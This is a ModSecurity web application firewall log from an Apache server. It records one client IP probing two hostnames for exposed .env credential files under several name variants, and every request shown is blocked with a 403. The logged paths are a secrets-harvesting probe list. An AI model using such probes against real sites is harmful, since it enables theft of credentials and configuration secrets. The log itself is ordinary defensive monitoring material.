[Mon May 11 11:52:24.770414 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:38516] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm12S6k_SCYd1AVZqt1wAAAQI"]
[Mon May 11 11:52:24.805618 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:38526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.config._"] [unique_id "agGm2BjZymfuKpjWXeh80QAAAMM"]
[Mon May 11 11:52:24.806105 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:38526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.config._"] [unique_id "agGm2BjZymfuKpjWXeh80QAAAMM"]
[Mon May 11 11:52:25.994363 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:38526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm2BjZymfuKpjWXeh80QAAAMM"]
[Mon May 11 11:52:26.021685 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:38534] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.config._"] [unique_id "agGm2mS6k_SCYd1AVZqt2AAAARE"]
[Mon May 11 11:52:26.022418 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:38534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.config._"] [unique_id "agGm2mS6k_SCYd1AVZqt2AAAARE"]
[Mon May 11 11:52:27.265939 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:38534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm2mS6k_SCYd1AVZqt2AAAARE"]
[Mon May 11 11:52:27.292688 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:38548] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.config2024"] [unique_id "agGm20Rdw2n9wv6Ai48IPgAAAJQ"]
[Mon May 11 11:52:27.293760 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:38548] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.config2024"] [unique_id "agGm20Rdw2n9wv6Ai48IPgAAAJQ"]
[Mon May 11 11:52:28.466887 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:38548] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm20Rdw2n9wv6Ai48IPgAAAJQ"]
[Mon May 11 11:52:28.499038 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:38560] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.config2024"] [unique_id "agGm3GS6k_SCYd1AVZqt2QAAARM"]
[Mon May 11 11:52:28.500216 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:38560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.config2024"] [unique_id "agGm3GS6k_SCYd1AVZqt2QAAARM"]
[Mon May 11 11:52:29.820863 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:38560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm3GS6k_SCYd1AVZqt2QAAARM"]
[Mon May 11 11:52:29.853734 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:38568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.development.orig"] [unique_id "agGm3URdw2n9wv6Ai48IPwAAAJU"]
[Mon May 11 11:52:29.854422 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:38568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.development.orig"] [unique_id "agGm3URdw2n9wv6Ai48IPwAAAJU"]
[Mon May 11 11:52:31.054236 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:38568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm3URdw2n9wv6Ai48IPwAAAJU"]
[Mon May 11 11:52:31.091296 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:38578] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.development.orig"] [unique_id "agGm30YQeUtAPynIs6xYPgAAAAg"]
[Mon May 11 11:52:31.091959 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:38578] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.development.orig"] [unique_id "agGm30YQeUtAPynIs6xYPgAAAAg"]
[Mon May 11 11:52:32.335124 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:38578] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm30YQeUtAPynIs6xYPgAAAAg"]
[Mon May 11 11:52:32.398016 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:38580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.dist2024"] [unique_id "agGm4ERdw2n9wv6Ai48IQAAAAIQ"]
[Mon May 11 11:52:32.398494 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:38580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.dist2024"] [unique_id "agGm4ERdw2n9wv6Ai48IQAAAAIQ"]
[Mon May 11 11:52:33.582633 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:38580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm4ERdw2n9wv6Ai48IQAAAAIQ"]
[Mon May 11 11:52:33.614440 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:29104] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.dist2024"] [unique_id "agGm4b4KNmD_mZ_vlf84qAAAAFM"]
[Mon May 11 11:52:33.615072 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:29104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.dist2024"] [unique_id "agGm4b4KNmD_mZ_vlf84qAAAAFM"]
[Mon May 11 11:52:34.844125 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:29104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm4b4KNmD_mZ_vlf84qAAAAFM"]
[Mon May 11 11:52:34.873876 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:29114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.docker.beta"] [unique_id "agGm4hjZymfuKpjWXeh81QAAAMg"]
[Mon May 11 11:52:34.874580 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:29114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.docker.beta"] [unique_id "agGm4hjZymfuKpjWXeh81QAAAMg"]
[Mon May 11 11:52:36.054833 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:29114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm4hjZymfuKpjWXeh81QAAAMg"]
[Mon May 11 11:52:36.104521 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:29120] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.docker.beta"] [unique_id "agGm5JkIEwRJMyDaV55OeAAAAVA"]
[Mon May 11 11:52:36.105431 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:29120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.docker.beta"] [unique_id "agGm5JkIEwRJMyDaV55OeAAAAVA"]
[Mon May 11 11:52:37.327752 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:29120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm5JkIEwRJMyDaV55OeAAAAVA"]
[Mon May 11 11:52:37.356375 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:29136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.docker.rc1"] [unique_id "agGm5URdw2n9wv6Ai48IQgAAAIE"]
[Mon May 11 11:52:37.357146 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:29136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.docker.rc1"] [unique_id "agGm5URdw2n9wv6Ai48IQgAAAIE"]
[Mon May 11 11:52:38.619482 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:29136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm5URdw2n9wv6Ai48IQgAAAIE"]
[Mon May 11 11:52:38.651537 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:29144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.docker.rc1"] [unique_id "agGm5kRdw2n9wv6Ai48IQwAAAJY"]
[Mon May 11 11:52:38.652094 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:29144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.docker.rc1"] [unique_id "agGm5kRdw2n9wv6Ai48IQwAAAJY"]
[Mon May 11 11:52:39.896385 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:29144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm5kRdw2n9wv6Ai48IQwAAAJY"]
[Mon May 11 11:52:39.927750 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:29146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.docker.sample"] [unique_id "agGm52S6k_SCYd1AVZqt3wAAAQk"]
[Mon May 11 11:52:39.928324 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:29146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.docker.sample"] [unique_id "agGm52S6k_SCYd1AVZqt3wAAAQk"]
